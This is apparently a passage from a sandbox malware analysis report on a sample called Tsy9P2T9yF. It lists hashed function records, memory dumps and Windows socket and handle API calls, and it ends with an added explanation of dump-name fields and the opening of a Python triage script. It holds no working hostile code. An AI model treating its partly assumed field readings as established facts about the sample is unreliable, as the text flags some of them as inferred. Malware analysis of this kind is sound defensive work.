                                                              • Opcode ID: 2270176297072e68a198bf00d2f94e2f1ba7075e74fcb3813ae85978eaea539b
                                                              • Instruction ID: c3039194a06c162b416ac3de6e55b52b9b05256532755c62970f411903c924f0
                                                              • Opcode Fuzzy Hash: 2270176297072e68a198bf00d2f94e2f1ba7075e74fcb3813ae85978eaea539b
                                                              • Instruction Fuzzy Hash: D3E0EDB6A192216BD654DE18F8449ABF769EFC4B20F059A49F85467204C730AC508BE2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P9
                                                              • API String ID: 0-2283168155
                                                              • Opcode ID: 136a8c49e1bb4e9455845620978ce4775dfc8b1a2a13e7064b0fd0c314f061bb
                                                              • Instruction ID: b0debc9de15b8d29621302a154c8b00a2f10f41182298e632dcc8c9a79ab3898
                                                              • Opcode Fuzzy Hash: 136a8c49e1bb4e9455845620978ce4775dfc8b1a2a13e7064b0fd0c314f061bb
                                                              • Instruction Fuzzy Hash: FD5190EB12C130BDB556C1416B14EFA676EE6DB730B328667F807D1582E3940B6B6131
                                                              APIs
                                                              • closesocket.WS2_32(?,00579422,?,?,?,?,?,?,?,?,?,?,?,w3V,008F7680,00000000), ref: 0057B04C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID:
                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: 8b78c3216fad740247c530386c6bc97df97b7f3063722cc6ab3fe52690b48687
                                                              • Instruction ID: 5a52fb5baf6ca32121b915a6d8fde2f4916c9ead73226c6721e428eaf86788e6
                                                              • Opcode Fuzzy Hash: 8b78c3216fad740247c530386c6bc97df97b7f3063722cc6ab3fe52690b48687
                                                              • Instruction Fuzzy Hash: C1D0C23070020057DA209A64D888B477B6B7FC1710F29CB68F42C4B154C73BCC439602
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,004EAF56,?,00000001), ref: 005167FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: 1d71b031e2068896dd0e9078d43ea7200cef32908f391db28787c2f0728746d5
                                                              • Instruction ID: 138fa63837c4d5d8309e9c11fbf541c660f582e4033b569c2718004ce565f68b
                                                              • Opcode Fuzzy Hash: 1d71b031e2068896dd0e9078d43ea7200cef32908f391db28787c2f0728746d5
                                                              • Instruction Fuzzy Hash: BDC080F511C101BFC70C8724D855B2F7BD8DB45355F01581CB046C11C0EA309994CF1B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P9
                                                              • API String ID: 0-2283168155
                                                              • Opcode ID: 1f4f0b2f7c2274f012f6b6536fcde12531561de54db7fdc3077a498ac065e402
                                                              • Instruction ID: dcc8ae4b5bfe27e4e8edfc214b745870533cb8fa069b83b5d11d90bc98abacbf
                                                              • Opcode Fuzzy Hash: 1f4f0b2f7c2274f012f6b6536fcde12531561de54db7fdc3077a498ac065e402
                                                              • Instruction Fuzzy Hash: F2416EEF12C130BDB55AC1416B54AFA666EE1DB730B328627F807D1682E3990B6B6131
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P9
                                                              • API String ID: 0-2283168155
                                                              • Opcode ID: 715addf88455af9fe7a541ca6b65a1bdd7343ba7b8e715be6ea665efe9e7095a
                                                              • Instruction ID: d87c4f43190494ba4768a798975cf8dbc2bf8ca16a2784d80c898292f20c5d74
                                                              • Opcode Fuzzy Hash: 715addf88455af9fe7a541ca6b65a1bdd7343ba7b8e715be6ea665efe9e7095a
                                                              • Instruction Fuzzy Hash: 3C41B2EF12C130BDB54AC1416B14EFA676EE5DB730B328667F807D1682E3940B6B6131
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P9
                                                              • API String ID: 0-2283168155
                                                              • Opcode ID: f7d9b0b288be8a0c6c04fd7acf7dfa86fb0beeefb5e81af7964469447bf63fb6
                                                              • Instruction ID: 76b8867dfcf57ba5eb5a48c8dcf9e6e9453a19c88926ae581e7877ecfb312bf9
                                                              • Opcode Fuzzy Hash: f7d9b0b288be8a0c6c04fd7acf7dfa86fb0beeefb5e81af7964469447bf63fb6
                                                              • Instruction Fuzzy Hash: 2541B3FB12C130BDB556C5816B14AFA676EE6DB730B328627F807D1582E3980F6B6131
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P9
                                                              • API String ID: 0-2283168155
                                                              • Opcode ID: 99c9520be2942870491ab067ff80de1ccca28d06db8b3415807e9fcc5add7841
                                                              • Instruction ID: a3c00c13aa19e5153c301a61df8b05ab56ed3ac4dc65d395ccab1f55c869e909
                                                              • Opcode Fuzzy Hash: 99c9520be2942870491ab067ff80de1ccca28d06db8b3415807e9fcc5add7841
                                                              • Instruction Fuzzy Hash: EE4180EF12C130BDB156C5416B14AFA666EE6DB730B328627F807D1682E3940F6A6131
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 01a4b09e886bae2d05fb2df64926543b5008984c19753b3ba8b44d7ea0e11fd3
                                                              • Instruction ID: 08b87e50c107c94a0a388f5069531fefd697124ced5fed2a635516c4c20e2e54
                                                              • Opcode Fuzzy Hash: 01a4b09e886bae2d05fb2df64926543b5008984c19753b3ba8b44d7ea0e11fd3
                                                              • Instruction Fuzzy Hash: ED3192B49093189BCB10EFB9C58569EBBF0FF85344F018869E894E7351E7749A44CF92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: z
                                                              • API String ID: 0-1657960367
                                                              • Opcode ID: 69b76dbc9474e5fd714e09c8474f23f39f748d3aaa23d66a9e323134a93d974e
                                                              • Instruction ID: 354921b7f5725ce1c680214d73091948cef5dd396d087c955e5f77dd676a0c26
                                                              • Opcode Fuzzy Hash: 69b76dbc9474e5fd714e09c8474f23f39f748d3aaa23d66a9e323134a93d974e
                                                              • Instruction Fuzzy Hash: D4014CF65383259ED306C5504B006FF77A5EA4F230F7142A5F406A25E2E3560B37A224
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: f4cd468e782633bf4012c6bc429d1940c2d8b6696bf05cf4b14ad709fe22fc92
                                                              • Instruction ID: 513699a2292790bf979978cf98deef0f7fc71f8cd3930bb05139dcc93ffbab5f
                                                              • Opcode Fuzzy Hash: f4cd468e782633bf4012c6bc429d1940c2d8b6696bf05cf4b14ad709fe22fc92
                                                              • Instruction Fuzzy Hash: 53C08CE4C1020052C700BA38814610D79E03740104FC00EA8988892084F32893188253
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d086367b0b70cd6a4da1707ba2a2bc301a828c2caa0bcec424c2a9ea24bbd28f
                                                              • Instruction ID: a7750af5f177dd402514f7cea40daabf30f700cc6b349af3b869f6741f68384f
                                                              • Opcode Fuzzy Hash: d086367b0b70cd6a4da1707ba2a2bc301a828c2caa0bcec424c2a9ea24bbd28f
                                                              • Instruction Fuzzy Hash: EC41F4EB12C1207DB24AC5416B14EFA676EE6CB730B32866BF803D2582D3950F6B6131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55d800bd72a6fcb23cabd1626c78558d4ea0fb975c4000a14edd08d227a2a9a8
                                                              • Instruction ID: cfa21576cfa7e3abf6ed7ce59fc923af405aaf86cef9d85f68284dd8706e211c
                                                              • Opcode Fuzzy Hash: 55d800bd72a6fcb23cabd1626c78558d4ea0fb975c4000a14edd08d227a2a9a8
                                                              • Instruction Fuzzy Hash: 894181EF12C1307D715AC1816B14BFA676ED1CBA30B728627F807D5582E3950B6B6131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26dd407a59d385fb9967962853091796bab16ee0a42ae0957a496788d5131794
                                                              • Instruction ID: b99cdf67d518705f624c76ccc3e5d425326317691f83b7e7af4b7496227f2923
                                                              • Opcode Fuzzy Hash: 26dd407a59d385fb9967962853091796bab16ee0a42ae0957a496788d5131794
                                                              • Instruction Fuzzy Hash: D34183EF12C1207DB15AC1416B14BFA676EE2DB730B32C667F807D1582E3990B6B6131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5177440b4c9822c44e576f9fcf3c2c305a435111b5f9719b83c05ecfff08cb7c
                                                              • Instruction ID: 6006cf4811cb8d7da780f1b5a43acabd70270cb4e196750b91b3806ad5a0e8e9
                                                              • Opcode Fuzzy Hash: 5177440b4c9822c44e576f9fcf3c2c305a435111b5f9719b83c05ecfff08cb7c
                                                              • Instruction Fuzzy Hash: 724170EF12C1247DB15AC1816B14BFA676DE1DBB30B32C667F807D2682E3950B6B6131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3fb23f224c565fc9f8b0a03c068f76ae449b865156de08ebf0c1c1bc25daa2b7
                                                              • Instruction ID: 25a4859c7f6d3bc408008d4b4e276c47658f8857c5e939d56a4e834aeab13358
                                                              • Opcode Fuzzy Hash: 3fb23f224c565fc9f8b0a03c068f76ae449b865156de08ebf0c1c1bc25daa2b7
                                                              • Instruction Fuzzy Hash: D64160EF12C120BDB15AC5816B14EFA676DD1DB730B328667F807D1582E3950B6A6131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9027cfbf5599dd475e8046b2b46fb5096f0c1d44533d612e76648152941f8f1c
                                                              • Instruction ID: 02cb2994a19c369cf43720b163e11fe9cc001a9f2f1b0ebe11901eb608f0a9c4
                                                              • Opcode Fuzzy Hash: 9027cfbf5599dd475e8046b2b46fb5096f0c1d44533d612e76648152941f8f1c
                                                              • Instruction Fuzzy Hash: D43181EF12C1207DB15AC1416B14FFA666ED1DB630B32C667F807E1682E3950F6B6131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b3a40ae76d96ff4c6c3d64a35777a2329bf04b4cbe227a2dc9975a7ececb8e9
                                                              • Instruction ID: 925c19b14bb82372b0df58629d688519b4302c964ee7a81cd3e9af40a7c5ec34
                                                              • Opcode Fuzzy Hash: 4b3a40ae76d96ff4c6c3d64a35777a2329bf04b4cbe227a2dc9975a7ececb8e9
                                                              • Instruction Fuzzy Hash: C531A2EF12C1307DB15AC1416B14FFA666ED1CB630B328667F807D2682E3950F6B6031
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 556aa483243909728c3660e20bc2281ad510f7ea9d2a4baa0efc173fb087daee
                                                              • Instruction ID: eb307651e1aaec96936dcd929720e45a359368e347ab7957273b29d9f713939a
                                                              • Opcode Fuzzy Hash: 556aa483243909728c3660e20bc2281ad510f7ea9d2a4baa0efc173fb087daee
                                                              • Instruction Fuzzy Hash: 8821EAEB52C1206DF51685405B14BFA676ED6DB230B328267F807E26D2D3950B6B6131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d71e224986ada95280dd51681856a4b49bcb9fea3d368ea342708517166b5053
                                                              • Instruction ID: 077a674aca2e3c5257b54bf4f29f606a8922198205927cad1593ff3f78dbbcd0
                                                              • Opcode Fuzzy Hash: d71e224986ada95280dd51681856a4b49bcb9fea3d368ea342708517166b5053
                                                              • Instruction Fuzzy Hash: B021EAEF12C124BDB15AC5816750BFA666ED6DF230F328266F807D26C2E3950B6B6131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c0b37d745a6560d3face43fd2eb5573fa5d8c509218eff610d2a216d3ad8b674
                                                              • Instruction ID: 281cbdae086bfbcf9759d1f2f4cbffea837405594ace5bacd8ad698b99a6287d
                                                              • Opcode Fuzzy Hash: c0b37d745a6560d3face43fd2eb5573fa5d8c509218eff610d2a216d3ad8b674
                                                              • Instruction Fuzzy Hash: 0E21C7EF12C124BDB11AC5815710BFA666ED6DB230B328266B807E2692E3950B7B7131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2eeb4c7f3d3bc2a9fda118399000d0dfa38d270d01f13cc1914a7f64989a166f
                                                              • Instruction ID: 917da492592d9f69cd1712a8362fd32847df845775598dbab88a0a5c72090ec9
                                                              • Opcode Fuzzy Hash: 2eeb4c7f3d3bc2a9fda118399000d0dfa38d270d01f13cc1914a7f64989a166f
                                                              • Instruction Fuzzy Hash: F821FBEF12C1247DB11AC5815710BFA666ED6CF230F328266F407E2692E3950F6B7131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4e3b60563df9b4c9ede49a1e7d0488ed67f49daa09eff391aa7bd4f8b73b7f6
                                                              • Instruction ID: 0c6563cdf408003eabf97c9080602c4650f3c29097a5000439873171d5789773
                                                              • Opcode Fuzzy Hash: e4e3b60563df9b4c9ede49a1e7d0488ed67f49daa09eff391aa7bd4f8b73b7f6
                                                              • Instruction Fuzzy Hash: 9C2108FF5281347DB51682815714BFA6B6DD6CF630F328266F803A25D2E3950B7A6131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09620182a923873f261784131f6912fb9062fc5fd09d756c5b1b0ea3191c02da
                                                              • Instruction ID: 7687c728c647dd8ae4005bf073bca9152904151eacac8a5f64f1f0ad363933e6
                                                              • Opcode Fuzzy Hash: 09620182a923873f261784131f6912fb9062fc5fd09d756c5b1b0ea3191c02da
                                                              • Instruction Fuzzy Hash: 12210BFF12C1247DB11AC1815714BFA666ED2CF630F328266F803A26D2E3950F7A6031
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 409c903a30bf94f26fa44a91290544514f6be2072975dc16ed95b9c9a54ac57d
                                                              • Instruction ID: bbb3ef22bd970cdfb7b6b4e745c9f91e73a81589ffa8435f333d4b33d5e6f702
                                                              • Opcode Fuzzy Hash: 409c903a30bf94f26fa44a91290544514f6be2072975dc16ed95b9c9a54ac57d
                                                              • Instruction Fuzzy Hash: C41187EF128124BDB55AC1416B14BFA566DD2DF230F328256F807A16D1D3950B7B6131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ef1abb81e96db9eb0dca34ed372531c0329b571ea8cb9d9eb5c6d0725e509a17
                                                              • Instruction ID: db32caee668ef012ea81158cc5f0a85dda3d1885bf14d5be3059212e80599cf3
                                                              • Opcode Fuzzy Hash: ef1abb81e96db9eb0dca34ed372531c0329b571ea8cb9d9eb5c6d0725e509a17
                                                              • Instruction Fuzzy Hash: 7601DBFF53C124ADB50A81516B10BFA6669D6DF230F3282A6F402E15D2D3950B7AA134
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8fd126ed8e2f13de5e8314fb7579a7987b20b9c41f768a32fc43749ad4b08ee3
                                                              • Instruction ID: 1edeeae5477e86ace1a3a5c07b9a635a60fb813b8ffe9d7268bcbb068909b98c
                                                              • Opcode Fuzzy Hash: 8fd126ed8e2f13de5e8314fb7579a7987b20b9c41f768a32fc43749ad4b08ee3
                                                              • Instruction Fuzzy Hash: F50128FB53C130ADA10AC14167507FD6765D6DF230F3282A6F406A26D2D39A0B7BA135
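Every record above comes from the same dump, 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, which the report marks as not based on a PE, and the dumps in the records that follow carry 01000000 in the same position and are based on a PE. The script below is an added example, not code from the Joe Sandbox report: it decodes the attributes carried in such dump names and turns them into a triage verdict. The field layout (<proc>.<phase>.<dumpid>.<base>.<protect>.<f6>.<memtype>.<f8>.sdmp) is an assumption inferred from the names on this page; only the base, protection and memory-type fields are interpreted, using the documented Win32 PAGE_* and MEM_* values, and the sixth field (00001000 versus 00000001 here) is left undecoded. The two input lines are copied from this report.

```python
"""
Decode the attributes encoded in a Joe Sandbox memory-dump name and flag the
region as unpacked, injected or rights-modified code.

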